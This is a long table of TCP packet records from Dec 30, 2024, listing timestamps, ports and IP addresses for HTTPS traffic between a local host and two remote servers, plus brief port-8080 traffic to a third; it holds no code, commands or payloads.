                                                                                                                                                                                Dec 30, 2024 19:45:57.728701115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.728755951 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.728761911 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.729098082 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.729118109 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.729159117 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.729163885 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.729185104 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.765280962 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.772259951 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:57.772341013 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:57.798182011 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.798198938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.798310995 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.798326015 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.798347950 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.798410892 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.808193922 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.808208942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.808252096 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.808258057 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.808278084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.808284998 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.808295965 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.808306932 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.808312893 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.808336973 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.808373928 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814021111 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814037085 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814074993 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814083099 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814117908 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814129114 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814295053 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814310074 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814354897 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814361095 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814433098 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814551115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814568043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814609051 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814615011 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814647913 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814662933 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.814955950 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.814970016 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.815016985 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.815022945 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.815061092 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.815134048 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.815624952 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.815644026 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.815723896 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.815731049 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.815917015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.884356976 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.884377003 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.884430885 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.884454012 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.884469032 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.884494066 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.894154072 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.894171000 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.894205093 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.894212008 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.894232035 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.894249916 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.894464970 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.894491911 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.894520044 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.894522905 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.894536972 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.894576073 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900688887 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900707006 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900746107 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900753021 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900789976 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900789976 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900831938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900847912 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900890112 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900893927 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900913954 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900926113 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900949001 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900949955 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.900960922 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.900971889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901001930 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901022911 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901343107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.901360035 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.901403904 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901408911 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.901428938 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901447058 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901871920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.901887894 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.901935101 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901941061 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.901952028 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.901989937 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.930027008 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.970707893 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.970730066 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.970774889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.970791101 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.970803022 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.970825911 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.980501890 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.980520010 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.980585098 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.980602980 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.980664015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.980778933 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.980793953 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.980834961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.980842113 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.980853081 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.980876923 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987307072 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987365007 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987377882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987436056 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987441063 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987452984 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987482071 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987493992 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987503052 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987514973 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987526894 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987576008 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987663984 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987679005 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987718105 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987723112 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987732887 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987740040 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987756968 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987770081 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987776995 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.987802029 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987824917 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.987994909 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.988009930 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.988059044 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.988064051 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:57.988075972 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.988127947 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:57.988936901 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.023438931 CET50077443192.168.2.4192.185.175.158
                                                                                                                                                                                Dec 30, 2024 19:45:58.057061911 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.057084084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.057128906 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.057151079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.057168007 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.057187080 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.066958904 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.066973925 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.067014933 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.067027092 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.067051888 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.067070961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.067323923 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.067337990 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.067389011 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.067394018 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.067410946 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.067429066 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.073405981 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.073421955 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.073462963 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.073470116 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.073503017 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.073518991 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.073761940 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.073781013 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.073822021 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.073827982 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.073844910 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.073863029 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.074114084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074132919 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074177980 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.074183941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074222088 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074244976 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074273109 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.074279070 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074297905 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.074321985 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.074637890 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074655056 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074700117 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.074707985 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.074750900 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.075238943 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.143323898 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.143340111 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.143388033 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.143399954 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.143419027 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.143435001 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.152990103 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.153011084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.153052092 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.153057098 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.153095961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.153095961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.153295040 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.153309107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.153356075 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.153367043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.153381109 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.153403044 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.159779072 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.159791946 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.159831047 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.159837008 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.159857988 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.159873009 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.159960032 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.159980059 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160021067 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160027027 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160037041 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160063982 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160305023 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160319090 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160366058 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160371065 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160391092 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160408020 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160715103 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160727024 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160778046 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160782099 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160806894 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160830021 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160830975 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160840988 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.160864115 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.160892963 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.229854107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.229872942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.229911089 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.229919910 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.229942083 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.229959965 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.239563942 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.239581108 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.239633083 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.239639044 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.239680052 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.239686966 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.239691019 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.239703894 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.239741087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.239744902 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.239767075 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.239783049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246068954 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246088982 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246150970 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246161938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246382952 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246404886 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246440887 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246445894 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246457100 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246488094 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246694088 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246707916 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246753931 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246761084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246799946 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246928930 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246942043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.246980906 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.246989012 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.247169971 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.247186899 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.247216940 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.247220993 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.247235060 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.247260094 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.287518024 CET500788080192.168.2.487.120.115.216
                                                                                                                                                                                Dec 30, 2024 19:45:58.292334080 CET80805007887.120.115.216192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.292402029 CET500788080192.168.2.487.120.115.216
                                                                                                                                                                                Dec 30, 2024 19:45:58.292498112 CET500788080192.168.2.487.120.115.216
                                                                                                                                                                                Dec 30, 2024 19:45:58.297244072 CET80805007887.120.115.216192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.297314882 CET500788080192.168.2.487.120.115.216
                                                                                                                                                                                Dec 30, 2024 19:45:58.302062035 CET80805007887.120.115.216192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.316237926 CET4435007645.118.248.184192.168.2.4
